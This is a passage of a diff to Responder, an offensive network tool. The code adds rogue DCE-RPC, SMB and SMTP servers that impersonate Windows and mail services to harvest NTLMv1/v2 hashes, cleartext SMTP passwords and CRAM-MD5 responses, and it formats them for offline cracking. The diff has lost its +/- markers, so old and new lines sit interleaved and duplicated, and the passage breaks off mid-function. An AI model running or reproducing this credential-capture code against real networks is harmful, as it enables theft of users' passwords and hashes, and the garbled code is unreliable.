DNSSERVER: "DNSSERVER"
}
def FindNTLMOpcode(data):
SSPIStart = data.find(b'NTLMSSP')
"""Find NTLMSSP message type in data"""
SSPIStart = data.find(b'NTLMSSP')
if SSPIStart == -1:
return False
SSPIString = data[SSPIStart:]
if len(SSPIString) < 12:
return False
return SSPIString[8:12]
def ParseRPCHash(data,client, Challenge): #Parse NTLMSSP v1/v2
SSPIStart = data.find(b'NTLMSSP')
def ParseRPCHash(data, client, Challenge):
"""Parse NTLMSSP v1/v2 hashes from RPC data"""
SSPIStart = data.find(b'NTLMSSP')
if SSPIStart == -1:
return
SSPIString = data[SSPIStart:]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
LMHash = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
if len(SSPIString) < 64:
return
try:
LMhashLen = struct.unpack('<H', data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H', data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
LMHash = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
NthashLen = struct.unpack('<H', data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H', data[SSPIStart+24:SSPIStart+26])[0]
# NTLMv1
if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen]
SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
DomainLen = struct.unpack('<H', SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H', SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H', SSPIString[38:40])[0]
UserOffset = struct.unpack('<H', SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
# Try to get hostname
HostnameLen = struct.unpack('<H', SSPIString[46:48])[0]
HostnameOffset = struct.unpack('<H', SSPIString[48:50])[0]
if HostnameLen > 0 and HostnameOffset + HostnameLen <= len(SSPIString):
Hostname = SSPIString[HostnameOffset:HostnameOffset+HostnameLen].decode('UTF-16LE', errors='ignore')
else:
Hostname = ''
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge, 'hex').decode('latin-1'))
SaveToDb({
'module': 'DCE-RPC',
'type': 'NTLMv1-SSP',
'client': client,
'hostname': Hostname,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
# NTLMv2
elif NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen]
SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
DomainLen = struct.unpack('<H', SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H', SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H', SSPIString[38:40])[0]
UserOffset = struct.unpack('<H', SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
# Try to get hostname
HostnameLen = struct.unpack('<H', SSPIString[46:48])[0]
HostnameOffset = struct.unpack('<H', SSPIString[48:50])[0]
if HostnameLen > 0 and HostnameOffset + HostnameLen <= len(SSPIString):
Hostname = SSPIString[HostnameOffset:HostnameOffset+HostnameLen].decode('UTF-16LE', errors='ignore')
else:
Hostname = ''
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge, 'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'DCE-RPC',
'type': 'NTLMv2-SSP',
'client': client,
'hostname': Hostname,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
except Exception as e:
if settings.Config.Verbose:
print(text('[DCE-RPC] Error parsing hash: %s' % str(e)))
if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen]
SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
SaveToDb({
'module': 'DCE-RPC',
'type': 'NTLMv1-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen]
SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'DCE-RPC',
'type': 'NTLMv2-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
def FindInterfaceUUID(data):
"""Find which RPC interface UUID is being requested"""
# Check for each known interface UUID in the data
for uuid, name in INTERFACE_NAMES.items():
if NetworkSendBufferPython2or3(uuid) in data:
return uuid, name
return None, None
class RPCMap(BaseRequestHandler):
"""RPCMap handler - Port 135 Endpoint Mapper"""
def handle(self):
try:
data = self.request.recv(1024)
data = self.request.recv(2048)
if not data:
return
self.request.settimeout(5)
Challenge = RandomChallenge()
if data[0:3] == b"\x05\x00\x0b":#Bind Req.
#More recent windows version can and will bind on port 135...Let's grab it.
# Handle BIND request
if data[0:3] == b"\x05\x00\x0b": # Bind Request
# Identify which interface first
uuid, interface_name = FindInterfaceUUID(data)
if not interface_name:
interface_name = "unknown interface"
# Check for NTLMSSP NEGOTIATE in BIND
if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
# Send NTLMSSP CHALLENGE
n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
n.calculate()
RPC = RPCNTLMNego(Data=n)
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
# Receive NTLMSSP AUTH
data = self.request.recv(2048)
if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
ParseRPCHash(data, self.client_address[0], Challenge)
print(color("[*] [DCE-RPC] NTLM authentication on %s from %s" % (interface_name, self.client_address[0].replace("::ffff:", "")), 3, 1))
self.request.close()
if NetworkSendBufferPython2or3(Map) in data:# Let's redirect to Mapper.
RPC = RPCMapBindAckAcceptedAns(CTX1UID=Map, CTX1UIDVersion="\x01\x00\x00\x00",CallID=NetworkRecvBufferPython2or3(data[12:16]))
if NetworkSendBufferPython2or3(NDR) in data and NetworkSendBufferPython2or3(Map) not in data: # Let's redirect to Mapper.
return
# Standard BIND processing
if NetworkSendBufferPython2or3(Map) in data:
RPC = RPCMapBindAckAcceptedAns(CTX1UID=Map, CTX1UIDVersion="\x01\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
elif NetworkSendBufferPython2or3(NDR) in data and NetworkSendBufferPython2or3(Map) not in data:
RPC = RPCMapBindAckAcceptedAns(CTX1UID=NDR, CTX1UIDVersion="\x02\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
else:
# Try to identify which interface
if uuid:
RPC = RPCMapBindAckAcceptedAns(CTX1UID=uuid, CTX1UIDVersion="\x01\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
if settings.Config.Verbose:
print(text('[DCE-RPC] BIND request for %s from %s' % (interface_name, self.client_address[0].replace("::ffff:", ""))))
else:
# Default to NDR
RPC = RPCMapBindAckAcceptedAns(CTX1UID=NDR, CTX1UIDVersion="\x02\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
if data[0:3] == b"\x05\x00\x00":#Mapper Response.
# DSRUAPI
if NetworkSendBufferPython2or3(DSRUAPI) in data:
# Try to receive more data (AUTH3 or REQUEST)
try:
data = self.request.recv(2048)
if data:
# Check for AUTH3 (packet type 0x10)
if len(data) > 2 and data[2:3] == b"\x10":
if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
ParseRPCHash(data, self.client_address[0], Challenge)
print(color("[*] [DCE-RPC] NTLM authentication on %s from %s" % (interface_name, self.client_address[0].replace("::ffff:", "")), 3, 1))
# Check for NTLM in any subsequent packet
elif FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
ParseRPCHash(data, self.client_address[0], Challenge)
print(color("[*] [DCE-RPC] NTLM authentication on %s from %s" % (interface_name, self.client_address[0].replace("::ffff:", "")), 3, 1))
except:
pass
# Handle mapper requests (after BIND)
elif data[0:3] == b"\x05\x00\x00": # Mapper request
uuid, name = FindInterfaceUUID(data)
if uuid == DSRUAPI:
x = RPCMapBindMapperAns()
x.calculate()
RPC = RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
print(color("[*] [DCE-RPC Mapper] Redirected %-15sto DSRUAPI auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
self.request.close()
#LSARPC
if NetworkSendBufferPython2or3(LSARPC) in data:
x = RPCMapBindMapperAns(Tower1UID=LSARPC,Tower1Version="\x00\x00",Tower2UID=NDR,Tower2Version="\x02\x00")
print(color("[*] [DCE-RPC Mapper] Redirected %-15s to DRSUAPI auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
elif uuid == LSARPC:
x = RPCMapBindMapperAns(Tower1UID=LSARPC, Tower1Version="\x00\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
x.calculate()
RPC = RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
print(color("[*] [DCE-RPC Mapper] Redirected %-15sto LSARPC auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
self.request.close()
#WINSPOOL
if NetworkSendBufferPython2or3(WINSPOOL) in data:
x = RPCMapBindMapperAns(Tower1UID=WINSPOOL,Tower1Version="\x01\x00",Tower2UID=NDR,Tower2Version="\x02\x00")
print(color("[*] [DCE-RPC Mapper] Redirected %-15s to LSARPC auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
elif uuid == SAMR:
x = RPCMapBindMapperAns(Tower1UID=SAMR, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
x.calculate()
RPC = RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
print(color("[*] [DCE-RPC Mapper] Redirected %-15sto WINSPOOL auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
print(color("[*] [DCE-RPC Mapper] Redirected %-15s to SAMR auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
elif uuid == SRVSVC:
x = RPCMapBindMapperAns(Tower1UID=SRVSVC, Tower1Version="\x03\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
x.calculate()
RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
print(color("[*] [DCE-RPC Mapper] Redirected %-15s to SRVSVC auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
elif uuid == WKSSVC:
x = RPCMapBindMapperAns(Tower1UID=WKSSVC, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
x.calculate()
RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
print(color("[*] [DCE-RPC Mapper] Redirected %-15s to WKSSVC auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
elif uuid == WINSPOOL:
x = RPCMapBindMapperAns(Tower1UID=WINSPOOL, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
x.calculate()
RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
print(color("[*] [DCE-RPC Mapper] Redirected %-15s to WINSPOOL auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
elif uuid == WINREG:
x = RPCMapBindMapperAns(Tower1UID=WINREG, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
x.calculate()
RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
print(color("[*] [DCE-RPC Mapper] Redirected %-15s to WINREG auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
elif uuid == SVCCTL:
x = RPCMapBindMapperAns(Tower1UID=SVCCTL, Tower1Version="\x02\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
x.calculate()
RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
print(color("[*] [DCE-RPC Mapper] Redirected %-15s to SVCCTL auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
elif uuid == ATSVC:
x = RPCMapBindMapperAns(Tower1UID=ATSVC, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
x.calculate()
RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
print(color("[*] [DCE-RPC Mapper] Redirected %-15s to ATSVC auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
elif uuid == DNSSERVER:
x = RPCMapBindMapperAns(Tower1UID=DNSSERVER, Tower1Version="\x05\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
x.calculate()
RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
print(color("[*] [DCE-RPC Mapper] Redirected %-15s to DNSSERVER auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
elif uuid == NETLOGON:
# Don't redirect NETLOGON for now - we want NTLM not SecureChannel
self.request.close()
#NetLogon
if NetworkSendBufferPython2or3(NETLOGON) in data:
self.request.close()
# For now, we don't want to establish a secure channel... we want NTLM.
#x = RPCMapBindMapperAns(Tower1UID=NETLOGON,Tower1Version="\x01\x00",Tower2UID=NDR,Tower2Version="\x02\x00")
#x.calculate()
#RPC = RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
#RPC.calculate()
#self.request.send(NetworkSendBufferPython2or3(str(RPC)))
#data = self.request.recv(1024)
#print(color("[*] [DCE-RPC Mapper] Redirected %-15sto NETLOGON auth server." % (self.client_address[0]), 3, 1))
except Exception:
self.request.close()
return
# Try to receive more data
try:
data = self.request.recv(2048)
if data and FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
ParseRPCHash(data, self.client_address[0], Challenge)
print(color("[*] [DCE-RPC] NTLM authentication on %s from %s" % (name or "unknown interface", self.client_address[0].replace("::ffff:", "")), 3, 1))
except:
pass
except Exception as e:
if settings.Config.Verbose:
print(text('[DCE-RPC] Exception in RPCMap: %s' % str(e)))
pass
finally:
try:
self.request.close()
except:
pass
class RPCMapper(BaseRequestHandler):
"""RPCMapper handler - Handles actual RPC service connections"""
def handle(self):
try:
data = self.request.recv(2048)
if not data:
return
self.request.settimeout(3)
Challenge = RandomChallenge()
# Look for NTLMSSP NEGOTIATE
if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
n.calculate()
RPC = RPCNTLMNego(Data=n)
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
# Wait for NTLMSSP AUTH
data = self.request.recv(2048)
# Look for NTLMSSP AUTH
if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
ParseRPCHash(data, self.client_address[0], Challenge)
self.request.close()
except Exception:
self.request.close()
print(color("[*] [DCE-RPC Mapper] NTLM authentication from %s" % self.client_address[0].replace("::ffff:", ""), 3, 1))
# Check if this is a BIND with auth
elif data[0:3] == b"\x05\x00\x0b":
uuid, name = FindInterfaceUUID(data)
if name and settings.Config.Verbose:
print(text('[DCE-RPC Mapper] Connection for %s from %s' % (name, self.client_address[0].replace("::ffff:", ""))))
# Check for NTLMSSP in BIND
if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
n.calculate()
RPC = RPCNTLMNego(Data=n)
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(2048)
if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
ParseRPCHash(data, self.client_address[0], Challenge)
print(color("[*] [DCE-RPC Mapper] NTLM authentication on %s from %s" % (name or "unknown interface", self.client_address[0].replace("::ffff:", "")), 3, 1))
except Exception as e:
if settings.Config.Verbose:
print(text('[DCE-RPC Mapper] Exception: %s' % str(e)))
pass
finally:
try:
self.request.close()
except:
pass

24
servers/SMB.py
View File

@@ -178,7 +178,7 @@ def IsNT4ClearTxt(data, client):
WordCount = data[HeadLen]
ChainedCmdOffset = data[HeadLen+1]
if ChainedCmdOffset == "\x75":
if ChainedCmdOffset == "\x75" or ChainedCmdOffset == 117:
PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
if PassLen > 2:
@@ -200,8 +200,8 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
if not data:
break
if data[0] == "\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
if data[0:1] == b"\x81": #session request 139
Buffer = b"\x82\x00\x00\x00"
try:
self.request.send(Buffer)
data = self.request.recv(1024)
@@ -209,7 +209,7 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
pass
##Negotiate proto answer SMBv2.
if data[8:10] == b"\x72\x00" and re.search(b"SMB 2.\?\?\?", data):
if data[8:10] == b"\x72\x00" and re.search(rb"SMB 2.\?\?\?", data):
head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00")
t = SMB2NegoAns()
t.calculate()
@@ -239,7 +239,11 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
## Session Setup 3 answer SMBv2.
if data[16:18] == b'\x01\x00' and GrabMessageID(data)[0:1] == b'\x02' or GrabMessageID(data)[0:1] == b'\x03' and data[4:5] == b'\xfe':
ParseSMBHash(data, self.client_address[0], Challenge)
head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data).decode('latin-1'))
if settings.Config.ErrorCode:
ntstatus="\x6d\x00\x00\xc0"
else:
ntstatus="\x22\x00\x00\xc0"
head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus=ntstatus, SessionID=GrabSessionID(data).decode('latin-1'))
t = SMB2Session2Data()
packet1 = str(head)+str(t)
buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
@@ -247,7 +251,7 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
data = self.request.recv(1024)
# Negotiate Protocol Response smbv1
if data[8:10] == b'\x72\x00' and data[4:5] == b'\xff' and re.search(b'SMB 2.\?\?\?', data) == None:
if data[8:10] == b'\x72\x00' and data[4:5] == b'\xff' and re.search(rb'SMB 2.\?\?\?', data) == None:
Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)))
Body.calculate()
@@ -335,7 +339,7 @@ class SMB1LM(BaseRequestHandler): # SMB Server class, old version
self.request.settimeout(1)
data = self.request.recv(1024)
Challenge = RandomChallenge()
if data[0] == b"\x81": #session request 139
if data[0:1] == b"\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
@@ -357,7 +361,11 @@ class SMB1LM(BaseRequestHandler): # SMB Server class, old version
self.request.send(NetworkSendBufferPython2or3(Buffer))
else:
ParseLMNTHash(data,self.client_address[0], Challenge)
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
if settings.Config.ErrorCode:
ntstatus="\x6d\x00\x00\xc0"
else:
ntstatus="\x22\x00\x00\xc0"
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode=ntstatus,pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
Packet = str(head) + str(SMBSessEmpty())
Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
self.request.send(NetworkSendBufferPython2or3(Buffer))

667
servers/SMTP.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# email: lgaffie@secorizon.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
@@ -15,7 +15,14 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from utils import *
from base64 import b64decode
from base64 import b64decode, b64encode
import hashlib
import codecs
import struct
import re
import ssl
import os
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
@@ -23,59 +30,617 @@ else:
from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2
class ESMTP(BaseRequestHandler):
"""SMTP server with multiple authentication methods and STARTTLS"""
def __init__(self, *args, **kwargs):
self.challenge = None
BaseRequestHandler.__init__(self, *args, **kwargs)
def send_response(self, code, message):
"""Send SMTP response"""
response = "%d %s\r\n" % (code, message)
self.request.send(response.encode('latin-1'))
def send_multiline_response(self, code, lines):
"""Send multi-line SMTP response"""
for i, line in enumerate(lines):
if i < len(lines) - 1:
response = "%d-%s\r\n" % (code, line)
else:
response = "%d %s\r\n" % (code, line)
self.request.send(response.encode('latin-1'))
def send_continue(self, data=""):
"""Send continuation response for AUTH"""
if data:
response = "334 %s\r\n" % data
else:
response = "334\r\n"
self.request.send(response.encode('latin-1'))
def upgrade_to_tls(self):
"""Upgrade connection to TLS using Responder's SSL certificates"""
try:
# Get SSL certificate paths from Responder config
cert_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
key_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
if not os.path.exists(cert_path) or not os.path.exists(key_path):
if settings.Config.Verbose:
print(text('[SMTP] SSL certificates not found'))
return False
# Create SSL context
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(cert_path, key_path)
# Wrap socket
self.request = context.wrap_socket(self.request, server_side=True)
if settings.Config.Verbose:
print(text('[SMTP] Successfully upgraded to TLS from %s' %
self.client_address[0].replace("::ffff:", "")))
return True
except Exception as e:
if settings.Config.Verbose:
print(text('[SMTP] TLS upgrade failed: %s' % str(e)))
return False
def handle_auth_plain(self, data):
"""Handle AUTH PLAIN"""
try:
# AUTH PLAIN can be:
# AUTH PLAIN <base64>
# or
# AUTH PLAIN
# <base64>
auth_match = re.search(b'AUTH PLAIN (.+)', data, re.IGNORECASE)
if auth_match:
# Inline format
auth_data = auth_match.group(1).strip()
else:
# Need to read next line
self.send_continue()
auth_data = self.request.recv(1024).strip()
if not auth_data or auth_data == b'*':
return False
# Decode
decoded = b64decode(auth_data)
# Format: [authzid]\x00username\x00password
parts = decoded.split(b'\x00')
if len(parts) >= 3:
username = parts[1].decode('latin-1', errors='ignore')
password = parts[2].decode('latin-1', errors='ignore')
elif len(parts) == 2:
username = parts[0].decode('latin-1', errors='ignore')
password = parts[1].decode('latin-1', errors='ignore')
else:
return False
SaveToDb({
'module': 'SMTP',
'type': 'AUTH-PLAIN',
'client': self.client_address[0],
'user': username,
'cleartext': password,
'fullhash': username + ":" + password,
})
if settings.Config.Verbose:
print(color("[*] [SMTP] Captured AUTH PLAIN credentials from %s for user %s" % (
self.client_address[0].replace("::ffff:", ""), username), 2, 1))
return True
except Exception as e:
if settings.Config.Verbose:
print(text('[SMTP] Error parsing AUTH PLAIN: %s' % str(e)))
return False
def handle_auth_login(self, data):
"""Handle AUTH LOGIN (two-stage)"""
try:
# Check if username is inline
auth_match = re.search(b'AUTH LOGIN (.+)', data, re.IGNORECASE)
if auth_match:
# Username provided inline
username_b64 = auth_match.group(1).strip()
username = b64decode(username_b64).decode('latin-1', errors='ignore')
else:
# Prompt for username
self.send_continue(b64encode(b"Username:").decode('latin-1'))
username_b64 = self.request.recv(1024).strip()
if not username_b64 or username_b64 == b'*':
return False
username = b64decode(username_b64).decode('latin-1', errors='ignore')
# Prompt for password
self.send_continue(b64encode(b"Password:").decode('latin-1'))
password_b64 = self.request.recv(1024).strip()
if not password_b64 or password_b64 == b'*':
return False
password = b64decode(password_b64).decode('latin-1', errors='ignore')
SaveToDb({
'module': 'SMTP',
'type': 'AUTH-LOGIN',
'client': self.client_address[0],
'user': username,
'cleartext': password,
'fullhash': username + ":" + password,
})
if settings.Config.Verbose:
print(color("[*] [SMTP] Captured AUTH LOGIN credentials from %s for user %s" % (
self.client_address[0].replace("::ffff:", ""), username), 2, 1))
return True
except Exception as e:
if settings.Config.Verbose:
print(text('[SMTP] Error parsing AUTH LOGIN: %s' % str(e)))
return False
def handle_auth_cram_md5(self, data):
"""Handle AUTH CRAM-MD5 (challenge-response)"""
try:
import time
import os
# Generate challenge
challenge = "<%d.%d@%s>" % (os.getpid(), int(time.time()), settings.Config.MachineName)
challenge_b64 = b64encode(challenge.encode('latin-1')).decode('latin-1')
# Send challenge
self.send_continue(challenge_b64)
# Receive response
response_b64 = self.request.recv(1024).strip()
if not response_b64 or response_b64 == b'*':
return False
response = b64decode(response_b64).decode('latin-1', errors='ignore')
# Format: username<space>digest
parts = response.split(' ', 1)
if len(parts) < 2:
return False
username = parts[0]
digest = parts[1].lower()
# Format for hashcat
hash_string = "%s:$cram_md5$%s$%s" % (username, challenge, digest)
SaveToDb({
'module': 'SMTP',
'type': 'CRAM-MD5',
'client': self.client_address[0],
'user': username,
'hash': digest,
'fullhash': hash_string,
})
if settings.Config.Verbose:
print(color("[*] [SMTP] Captured CRAM-MD5 hash from %s for user %s" % (
self.client_address[0].replace("::ffff:", ""), username), 3, 1))
return True
except Exception as e:
if settings.Config.Verbose:
print(text('[SMTP] Error parsing CRAM-MD5: %s' % str(e)))
return False
def handle_auth_digest_md5(self, data):
"""Handle AUTH DIGEST-MD5"""
try:
import time
import os
# Generate nonce
nonce = hashlib.md5(str(time.time()).encode()).hexdigest()
# Build challenge
challenge_parts = [
'realm="%s"' % settings.Config.MachineName,
'nonce="%s"' % nonce,
'qop="auth"',
'charset=utf-8',
'algorithm=md5-sess'
]
challenge = ','.join(challenge_parts)
challenge_b64 = b64encode(challenge.encode('latin-1')).decode('latin-1')
# Send challenge
self.send_continue(challenge_b64)
# Receive response
response_b64 = self.request.recv(1024).strip()
if not response_b64 or response_b64 == b'*':
return False
response = b64decode(response_b64).decode('latin-1', errors='ignore')
# Parse response
username_match = re.search(r'username="([^"]+)"', response)
realm_match = re.search(r'realm="([^"]+)"', response)
